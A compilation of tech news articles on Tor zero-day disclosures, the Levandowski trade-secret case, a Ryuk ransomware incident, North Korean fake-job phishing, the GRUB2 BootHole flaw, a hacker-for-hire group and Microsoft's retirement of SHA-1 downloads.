Information Technology

Image: Tor Project

Over the past week, a security researcher has published technical details about two vulnerabilities impacting the Tor network and the Tor browser.
In blog posts last week and today, Dr. Neal Krawetz said he was going public with details on two zero-days after the Tor Project has repeatedly failed to address multiple security issues he reported throughout the past years.
The researcher also promised to reveal at least three more Tor zero-days, including one that can reveal the real-world IP address of Tor servers.
Approached for comment on Dr. Krawetz’s intentions, the Tor Project did not reply to a request for comment and provide additional details on its stance on the matter.
The first Tor zero-day
Dr. Krawetz, who operates multiple Tor nodes himself and has a long history of finding and reporting Tor bugs, disclosed the first Tor zero-day last week.

In a blog post dated July 23, the researcher described how companies and internet service providers could block users from connecting to the Tor network by scanning network connections for “a distinct packet signature” that is unique to Tor traffic.
The packet could be used as a way to block Tor connections from initiating and effectively ban Tor altogether — an issue that oppressive regimes are very likely to abuse.
The second Tor zero-day
Earlier today, in a blog post shared with ZDNet, Dr. Krawetz disclosed a second issue. This one, like the first, allows network operators to detect Tor traffic.
However, while the first zero-day could be used to detect direct connections to the Tor network (to Tor guard nodes), the second one can be used to detect indirect connections.
These are connections that users make to Tor bridges, a special type of entry points into the Tor network that can be used when companies and ISPs block direct access to the Tor network.
Tor bridges act as proxy points and relay connections from the user to the Tor network itself. Because they are sensitive Tor servers, the list of Tor bridges is being constantly updated to make it difficult for ISPs to block it.
But Dr. Krawetz says connections to Tor bridges can be easily detected, as well, using a similar technique of tracking specific TCP packets.
“Between my previous blog entry and this one, you now have everything you need to enforce the policy [of blocking Tor on a network] with a real-time stateful packet inspection system. You can stop all of your users from connecting to the Tor network, whether they connect directly or use a bridge,” Dr. Krawetz said.
Both issues are specifically concerning for Tor users residing in countries with oppressive regimes.
Dissatisfaction towards the Tor Project’s security stance
The reason why Dr. Krawetz is publishing these zero-days is that he believes the Tor Project does not take the security of its networks, tools, and users seriously enough.
The security researcher cites previous incidents when he tried to report bugs to the Tor Project only to be told that they were aware of the issue, working on a fix, but never actually deploying said fix. This includes:
A bug that allows websites to detect and fingerprint Tor browser users by the width of their scrollbar, which the Tor Project has known about since at least June 2017.
A bug that allows network adversaries to detect Tor bridge servers using their OR (Onion routing) port, reported eight years ago.
A bug that lets attackers identify the SSL library used by Tor servers, reported on December 27, 2017.
All of these issues are still not fixed, which has led Dr. Krawetz in early June 2020 to abandon his collaboration with the Tor Project and take the current approach of publicly shaming the company into taking action.

I’m giving up reporting bugs to Tor Project. Tor has serious problems that need to be addressed, they know about many of them and refuse to do anything.I’m holding off dropping Tor 0days until the protests are over. (We need Tor now, even with bugs.) After protests come 0days.
— Dr. Neal Krawetz (@hackerfactor) June 4, 2020 More

US prosecutors are seeking a total of 27 months behind bars for Anthony Levandowski, the former head of Uber’s self-driving arm who pleaded guilty to stealing trade secrets from Google. 

Levandowski was indicted by the US Department of Justice (DoJ) on 33 counts of theft and attempted theft in 2019 for stealing intellectual property belonging to his former employer. 
The ex-Google engineer worked on the tech giant’s self-driving technologies from 2009 to 2016 before abruptly resigning to found his own company. 
Prosecutors claimed that before he left his post, Levandowski downloaded a treasure trove of 14,000 internal documents relating to engineering, manufacturing, and business, specifically linked to Google’s LiDAR and self-driving car research. 
See also: Uber’s future may be more about Uber Eats, Uber Freight than ride sharing

Otto, a rival in the same space, was co-founded by the engineer together with Lior Ron. Otto was later acquired by Uber. 
“All of us have the right to change jobs,” said US Attorney Anderson at the time of the indictment. “None of us has the right to fill our pockets on the way out the door. Theft is not innovation.”
Levandowski pleaded guilty in March to the theft of trade secrets under a plea agreement. 
After Google and the company’s self-driving firm Waymo complained that Uber’s innovations in the intelligent vehicle space were made off the back of their own R&D, in 2018, Uber issued Alphabet 0.34% of a late stock offering, the equivalent of $250 million at the time. Levandowski, once the head of Uber’s self-driving team, was fired.
Uber has taken the stance that none of Waymo’s autonomous vehicle technology ever made it into their own systems, but revised its software nonetheless to stave off any future IP claims. 
CNET: Alexa Echo snooping-blocker from MSCHF could protect your privacy
Prosecutors now aim to secure over two years imprisonment, three years of supervised release, and a restitution payment of close to $756,500 which has already been agreed upon between Waymo and Uber, as reported by Reuters. 
Court documents filed in a Californian court note that Levandowski’s defense team has asked for one year of home confinement and a fine of $95,000. 
Levandowski filed for bankruptcy earlier this year after being ordered to pay Google $179 million.
TechRepublic: DevSecOps tutorial: What is it, and how can it improve application security?
Earlier this month, Uber became subject to a separate complaint filed by unions and representatives of both gig-economy and app-based drivers who are demanding to see the code and algorithms used by the company. The complaint alleges that Uber is not complying with GDPR and that drivers have a right to see any data that could determine their working lives. 
In May, Uber announced the ax of 3,000 employees on top of 3,700 members of staff laid off previously due to business disruption caused by the COVID-19 pandemic. 
Previous and related coverage
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Security experts have given an insight into how a targeted ransomware attack took down the network of a food and drink manufacturer after hackers took advantage of common security vulnerabilities.
The crooks used a phishing attack and took advantage of a number of vulnerabilities – from old hardware to default passwords – to first deploy Emotet and Trickbot malware before delivering the Ryuk ransomware and attempting to extort a fee from the victim to restore the network.

More on privacy

In this case, the organisation didn’t opt to pay the ransom – something that authorities discourage and would only fund additional attacks by cyber criminals – but instead had security experts come in to examine the network and restore functionality within 48 hours.
“This was a targeted attack. This is targeting organisations such as this one which, if they don’t have the security retainer or IT staff, the initial reaction would be to give into the ransomware attack because they want to return their operations quickly,” Bindu Sundaresan, director at AT&T cybersecurity, told ZDNet.
SEE: A winning strategy for cybersecurity (ZDNet special report) | Download the report as a PDF (TechRepublic)    

AT&T investigated the attack and helped the unnamed manufacturer get back online without giving into a ransom demand while also experiencing the least amount of disruption to production as possible. But the company likely would not have fallen victim if basic security vulnerabilities hadn’t allowed the initial stages of the attack to happen.
Ryuk, like some other forms of ransomware, is deployed as the final stage in a three-pronged attack that also delivers Emotet and Trickbot. Emotet started life as a banking trojan before evolving into a botnet that is leased out to deliver other malware, which in this case is the Trickbot trojan.
Trickbot is a powerful form of malware that provides attackers with a full backdoor into compromised systems, including the ability to move around networks, issue commands and steal additional data.
After this the Ryuk ransomware is downloaded onto the network by the hackers because cyber criminals view it as the quickest and easiest way to make money from a compromised network.
While many ransomware campaigns now start with targeting remote ports, this one began with a phishing attack.
“A user was sent a Microsoft Word document as part of a phishing campaign. It was labelled as an invoice and this user downloaded the document, then malicious code executed a PowerShell command that downloaded an Emotet payload,” Sundaresan explained.
PowerShell commands generally aren’t required by users who don’t need administrator rights, so if PowerShell had been disabled for those who don’t need it, the cyberattack could’ve been cut off at this point.
After Emotet formed the initial part of the attack, gaining a foothold in the network the next step was to use the Trickbot malware to steal login credentials for corporate accounts and cloud services to gain access to other parts of the network.
By exploiting this cycle, cyber criminals were able to gain control of over half the network, before eventually delivering the Ryuk ransomware.
“Malware like this wants to get the most bang for its buck and go after organisations that are at the point where they feel like they need to give in due to the damage it’s costing to their network, the valuable data that’s being held – so they have a sense of urgency,” said Sundaresan.
However, the attack could have been much worse, given Ryuk had not compromised the entire network but about 60% of it, including ordering and billing applications. This was in part because security personnel were about to contain the attack after being called in by the manufacturer.
“The ability to contain it and the response time was crucial. The ability to contain the incident is the key to recover from it and having the business up and running before it got to the crucial databases,” Sundaresan explained.
Within 48 hours, much of the business was back up and running again – crucially without having given into paying a ransom demand to criminals. However, two days of downtime would have been costly to the organisation and restoring the network isn’t likely to have been cheap either – plus there’s the prospect of having to upgrade security in the aftermath, so attackers don’t strike again.
And like many organisations that fall victim to cyberattacks, this one could’ve prevented itself from falling victim to ransomware by ensuring that cybersecurity hygiene was well managed – but there were simple-to-fix vulnerabilities that attackers were able to take advantage of.
SEE: Ransomware: 11 steps you should take to protect against disaster
For example, the vulnerabilities that Emotet, Trickbot and Ryuk take advantage of have been known about for a long time and critical security updates have been issued to protect users – but despite these updates being years old, there are organisations that still haven’t applied them.
“Microsoft has put out patches but patch management and security hygiene still remain issues for organisations,” said Sundaresan, who added that this ransomware attack could’ve also been prevented if strong passwords and multi-factor authentication had been used to secure systems.
“A lot of this can be prevented. If they didn’t have default password and end-of-life machines, a lot of this would’ve been prevented.”
And when it comes to cyberattacks, prevention is the best cure, because not only does it stop your organisation from falling victim to ransomware or other malware, the cost of securing the network in advance is almost certainly going to be less expensive than having to do it in the aftermath of an incident – especially if the attack disrupts operations or causes reputational damage that could keep customers away.
So while it might potentially seem expensive, it could be very much worth having security experts from outside the organisation come in to examine the network before damage can be done – and not after.
“Get a security assessment done from an offensive attacker point of view, you don’t want to be just doing the security initiatives from compliance or internal testing – it’s not enough. You have to get your network tested using multiple attack vectors and you have to do it objectively with full penetration testing,” Sundaresan said.
Because ultimately, ransomware – be it Ryuk or another family – is still out there and still remains a threat because too many organisations aren’t following the security basics. And until this is fixed, ransomware will remain a problem.

MORE ON CYBERSECURITY More

Soldier is Using Laptop Computer for Tracking the Target and Radio for Communication During Military Operation in the Desert
Getty Images/iStockphoto
While the world was in the midst of the COVID-19 pandemic, North Korean hackers were targeting the US defense and aerospace sectors with fake job offers in the hopes of infecting employees looking for better opportunities and gaining a foothold on their organizations’ networks.
The attacks began in late March and lasted throughout May 2020, cyber-security firm McAfee said in a report published today.

Image: McAfee
Tracked under the codename of “Operation North Star,” McAfee said these attacks have been linked to infrastructure and TTPs (Techniques, Tactics, and Procedures) previously associated with Hidden Cobra — an umbrella term the US government uses to describe all North Korean state-sponsored hacking groups.
The good ol’ fake job offer trick
As for the attacks themselves, McAfee said they were run-of-the-mill spear-phishing emails that enticed recipients to open boobytrapped documents containing a possible job offer.
Many hacking groups have leveraged this lure in the past, and North Korean hackers also used it before in attacks against the US defense sector in campaigns that took place in 2017 and 2019, Christiaan Beek, Lead Scientist & Senior Principal Engineer, told ZDNet in an email.

In fact, the 2017 attacks were cited in the US indictment against a North Korean hacker believed to have taken part in the attacks, but also in the creation of the WannaCry ransomware.
But the 2020 attacks also had their variations — namely the malware they delivered and the fact that some victims were also approached via social networks, and not necessarily via email.
The entire infection chain, from contact to how the malware operates, is detailed in summary in the graphic below, and in full glorious technical details in the McAfee report.

Image: McAfee
Questions, however, remain about the efficacy of this campaign. With workforce movement at an all-time low during the coronavirus pandemic, it’s unclear how successful North Korean hackers were by employing a “new job” theme to lure in victims.
Unfortunately, McAfee said it didn’t have access to the email themselves, where these lures were used, and they only managed to recover the boobytrapped documents and the malware payloads.
As a result, McAfee wasn’t able to determine with precision which US defense or aerospace companies were the targets of these attacks and then notify each.
The only things they could determine were the nature of the fake job positions (Senior Design Engineer and System Engineer) and the US defense programs hackers were trying to “recruit” for:
F-22 Fighter Jet Program
Defense, Space, and Security (DSS)
Photovoltaics for space solar cells
Aeronautics Integrated Fighter Group
Military aircraft modernization programs
Raj Samani, McAfee Chief Scientist, told ZDNet yesterday that they have reached out to US cyber-security agencies to notify authorities of the past attacks as part of their normal deconfliction procedures whenever they discover campaigns like these ones.
Attacks focused on intelligence gathering
The point of these attacks was also pretty clear, with the North Star campaign being clearly part of North Korea’s cyber-espionage and intelligence-gathering efforts.
With the country under heavy economic sanctions and lacking a self-sustaining military-industrial complex, it can only support its nuclear weapons program and ambitions by importing or stealing the information it needs — which in this case, it was hoping to obtain from US defense and aerospace contractors.
However, another way through which North Korea sustains its nuclear program is by allowing its hackers to engage in mundane cybercrime and launder the money back into the hermit kingdom. In similar news this week, security firm Kaspersky published research on Tuesday linking North Korea’s hackers to a new strain of ransomware named VHD.
Prior to that, the group was also linked to all sorts of cybercrime, such as BEC operations, Magecart attacks, bank cyber-heists, cryptocurrency hacks and scams, ATM cashouts, and crypto-mining botnets.
Despite being a small and walled nation, North Korea has built one of the most powerful and advanced army of hackers to date, and the diversity of its operations proves this point. More

Open Source

Secure boot, despite the name, isn’t as secure as we’d like. Security company Eclypsium discovered a security hole in GRUB2: Boothole. Linux users know GRUB2 as one of the most commonly used bootloaders. As such, this security problem makes any machine potentially vulnerable to a possible attack — the keyword is “potentially.”
BootHole enables hackers to insert and execute malicious code during the boot-loading process. Once planted there, the nasty bootkit payload can allow attackers to plant code that later take over the operating system. Fortunately, Linux distro developers were warned of this problem, and most of them have already issued patches. 
Besides, to use BootHole, a hacker has to edit grub.cfg, the GRUB2 configuration file. Therefore, to successfully attack a Linux system, an attacker must already have root-level access to the target system. Practically speaking, such a hacker has already compromised the system. With such access, attackers can modify grub.cfg values to trigger a buffer overflow, which can then be used to insert a malware payload.
While Eclypsium found the initial GRUB2 problem, Linux developers found other trouble hiding within GRUB2. Joe McManus, Canonical’s security engineering director, said:

Thanks to Eclypsium, we at Canonical, along with the rest of the open-source community, have updated GRUB2 to defend against this vulnerability. During this process, we identified seven additional vulnerabilities in GRUB2, which will also be fixed in the updates released today. The attack itself is not a remote exploit and it requires the attacker to have root privileges. With that in mind, we do not see it being a popular vulnerability used in the wild. However, this effort really exemplifies the spirit of community that makes open source software so secure.”  

Red Hat is also on the case. Peter Allor, Red Hat’s director of productsSecurity, said:

“Red Hat is aware of a flaw (CVE-2020-10713) in GRUB 2.  Product Security has conducted a thorough analysis and understands not only how this flaw impacts Red Hat products, but most importantly how this impacts the Linux kernel. Our PSIRT has been working closely with engineering, cross-functional teams, the Linux community as well as our industry partners to deliver currently available updates for affected Red Hat products, including Red Hat Enterprise Linux.”

Marcus Meissner, the lead of the SUSE Security Team, points out, however, that while the problem is serious and needs patching, it’s not that bad. He observed:

“Given the need for root access to the bootloader, the described attack appears to have limited relevance for most cloud computing, data center, and personal device scenarios, unless these systems are already compromised by another known attack. However, it does create an exposure when untrusted users can access a machine, e.g. bad actors in classified computing scenarios or computers in public spaces operating in unattended kiosk mode.”

So, the moral of the story is that, while you should patch your Linux system, this security hole is really only a problem in a very few limited situations. 
Related Stories: More

Image: Screengrab from Kaspersky webinar

Special feature

Cyberwar and the Future of Cybersecurity
Today’s security threats have expanded in scope and seriousness. There can now be millions — or even billions — of dollars at risk when information security isn’t handled properly.
Read More

Russian cyber-security firm Kaspersky said today in a webinar that it discovered a new hacker-for-hire mercenary group that appears to have been active for almost a decade.
The group, which Kaspersky codenamed Deceptikons, has primarily targeted law firms and fintech companies, according to Kaspersky malware analyst Vicente Diaz.
The Kaspersky researcher said the group appears to be focused on stealing business and financial secrets, rather than government-related information.
Diaz said most of the group’s targets are located in Europe, and occasionally some Middle East countries like Israel, Jordan, and Egypt.
The Deceptikons’ group most recent attacks included a 2019 spear-phishing campaign against a set of European law firms, where the group deployed malicious PowerShell scripts to infect hosts.
Deceptikons doesn’t use zero-days

“The group is not technically sophisticated and has not, to our knowledge, deployed zero-day exploits,” the Russian security firm said today in a separate written report that accompanied its webinar.
Kaspersky described the group’s infrastructure and malware as “clever, rather than technically advanced” and with a focus on gaining persistence on infected hosts.
Most attacks seem to follow a similar patter, starting with a spear-phishing email that carries a malicious modified LNK (shortcut) file.
If the victims download and interact with the file (such as clicking it), the shortcut downloads and runs a PowerShell-based backdoor trojan.
Diaz said Kaspersky would be publishing a more complete technical report on Deceptikons activities in the coming weeks.
Second hacker-for-hire group exposed this year
This is the second major hacker-for-hire mercenary group that came to light this year after Citizen Lab exposed Indian firm BellTroX InfoTech Services as the group behind the Dark Basin APT.
Kaspersky did not link Deceptikons to any real-world entity, however. At least, for the time being. More

Image: Eclypsium

Details about a new vulnerability in a core component of the Secure Boot process have been published today.
The vulnerability, codenamed BootHole, allows attackers to tamper with the boot-loading process that precedes starting up the actual operating system (OS).
This process relies on components known as bootloaders that are responsible for loading the firmware of all computer hardware components on which the actual OS runs.
BootHole is a vulnerability in GRUB2, one of today’s most popular bootloader components. Currently, GRUB2 is used as the primary bootloader for all major Linux distros, but it can also boot and is sometimes used for Windows, macOS, and BSD-based systems as well.
How BootHole works
The BootHole vulnerability was discovered earlier this year by security researchers from Eclypsium. The actual full technical details about the bug have been published today on the Eclypsium blog.

Researchers say BootHole allows attackers to tamper with the GRUB2 component to insert and execute malicious code during the boot-loading process, effectively allowing attackers to plant code that has full control of the OS, launched at a later point.
This type of malware is usually known as a bootkit because it lives inside bootloaders, in the motherboard physical memory, in locations separate from the actual OS, allowing it to survive OS reinstalls.
According to Eclypsium, the actual BootHole vulnerability is located inside grub.cfg, a configuration file separate from the actual GRUB2 component, from where the bootloader pulls system-specific settings. Eclypsium says that attackers can modify values in this file to trigger a buffer overflow inside the GRUB2 component when it reads the file on every OS boot.
The image below shows a simplified explanation of the BootHole attack, where attackers can piggyback on the “overflowing” code from one or more grub.cfg options to execute malicious commands inside the GRUB2 component.

Eclypsium says BootHole can be (ab)used to tamper with the bootloader, or even replace it with a malicious or vulnerable version.

Making matters worse, Eclypsium says that a BootHole attack also works even when servers or workstations have Secure Boot enabled.
Secure Boot is a process where the server/computer uses cryptographic checks to make sure the boot process loads only cryptographically signed firmware components.
BootHole attack work even with Secure Boot enabled because, for some devices or OS setups, the Secure Boot process doesn’t cryptographically verify the grub.cfg file, allowing attackers to tamper with its content.

Some limitations to this attack also exist. Eclypsium says that the attacker needs admin access in order to tamper with the grub.cfg file. This looks like a limitation, but in reality, it is not. Operating systems and their components are littered with “elevation of privilege” bugs that could be exploited as part of a BootHole attack chain to let malware gain admin access and modify grub.cfg.
Furthermore, the Secure Boot process was specifically created to prevent even high-privileged admin accounts from compromising the boot process, meaning that BootHole is a major security hole in one of the IT ecosystem’s most secure operations.
Patches coming later today
For the past months, Eclypsium says it’s been notifying the entire hardware and software ecosystem about BootHole (CVE-2020-10713).
The company estimates that every Linux distribution is impacted by this vulnerability, as all use GRUB2 bootloaders that read commands from an external grub.cfg file.
“To date, more than 80 shims are known to be affected,” Eclypsium said. Shims are components that allow vendor/OEM-specific firmware code to interact with GRUB2.
“In addition to Linux systems, any system that uses Secure Boot with the standard Microsoft UEFI CA is vulnerable to this issue,” the research team added, speaking about GRUB2’s possible impact on other operating systems that use GRUB2 in a Secure Boot process.
“As a result, we believe that the majority of modern systems in use today, including servers and workstations, laptops and desktops, and a large number of Linux-based OT and IoT systems, are potentially affected by these vulnerabilities.”
Eclypsium says that starting today and for the coming days and weeks, all sorts of IT companies are expected to release patches to address BootHole in their products.
The security vendor said it expected security alerts and patches from:
Microsoft
UEFI Security Response Team (USRT)
Oracle
Red Hat (Fedora and RHEL)
Canonical (Ubuntu)
SuSE (SLES and openSUSE)
Debian
Citrix
HP
VMware
OEMs
Software vendors, including security software
Eclypsium said it expects patching to take a long while, as fixing bootloader bugs is usually a complex process due to the multitude of components and advanced cryptography involved in the process. Anyway, look for CVE-2020-10713 patches in future changelogs. More

Microsoft announced this week plans to remove all Windows-related file downloads from the Microsoft Download Center that are cryptographically signed with the Secure Hash Algorithm 1 (SHA-1).
The files will be removed next Monday, on August 3, the company said on Tuesday.
The OS maker cited the security of the SHA-1 algorithm for the move.
“SHA-1 is a legacy cryptographic hash that many in the security community believe is no longer secure. Using the SHA-1 hashing algorithm in digital certificates could allow an attacker to spoof content, perform phishing attacks, or perform man-in-the-middle attacks,” it said.
SHA-1, broken since 2016
Most software companies have recently begun abandoning the SHA-1 algorithm after a team of academics broke the SHA-1 hashing function at a theoretical level in February 2016.

The algorithm was broken in a real-world practical attack in February 2017, when Google cryptographers disclosed SHAttered, a technique that could make two different files appear as they had the same SHA-1 file signature.
At the time, creating an SHA-1 collision was considered computationally expensive, and Google experts thought SHA-1 could still be used in practice for at least half a decade until the cost would go down.
However, subsequent research released in May 2019 and in January 2020, detailed an updated methodology to cut down the cost of an SHA-1 collision attack to under $110,000 and then to under $50,000.
Since 2016, software makers have abandoned SHA-1, mainly for SHA-2. Google removed SHA-1 support from Chrome with the release of Chrome 56, at the end of January 2017; Firefox removed SHA-1 support in Firefox 51, also released at the end of January 2017; and Microsoft dropped support for SHA-1 in Edge and Internet Explorer in mid-2017.
Apple followed by removing SHA-1 from iOS 13 and macOS Catalina, and OpenSSH announced plans to deprecate SHA-1 for its login process earlier this year.
Microsoft, since August 2019, no longer uses SHA-1 to sign and authenticate Windows OS updates. Currently, Microsoft is in the process of replacing SHA-1 with SHA-2 across its products.
However, the OS maker didn’t specify if the Windows-related files that are being removed from its downloads center on Monday will be replaced with new download links signed with SHA-2, leaving many too wonder if they’ll ever be able to download some of Microsoft’s old tools. More